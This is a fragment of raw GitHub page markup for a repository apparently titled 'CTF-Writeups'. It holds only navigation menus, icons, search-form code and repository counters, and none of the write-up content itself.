.25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> Explore All features Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For Enterprise Teams Startups Education <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> By Solution CI/CD & Automation DevOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> DevSecOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Case Studies Customer Stories Resources <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div> Repositories Topics Trending Collections </div> Pricing </nav> <div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0"> <div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="481769760" data-scoped-search-url="/not1cyyy/CTF-Writeups/search" data-owner-scoped-search-url="/users/not1cyyy/search" data-unscoped-search-url="/search" data-turbo="false" action="/not1cyyy/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="S+7ChqUEHXhEJbYGo3X0d7LEVHXhnJ+Wbh6Br9JkOIVl7bfBJj1/RQdHLoqlW36WUU+ohdOet0+2WBJOY/46Tg==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <span>No suggested jump to results</span> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> </div> </label></form> </div></div> </div> <div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div> Sign up </div> </div> </div> </div></header> </div> <div id="start-of-content" class="show-on-focus"></div> <div id="js-flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div> </div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" > <div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace> <div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;"> <div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> not1cyyy </span> <span>/</span> CTF-Writeups <span></span><span>Public</span> </div> </div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span> <div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>7</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div> </div> <div id="responsive-meta-container" data-turbo-replace></div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon 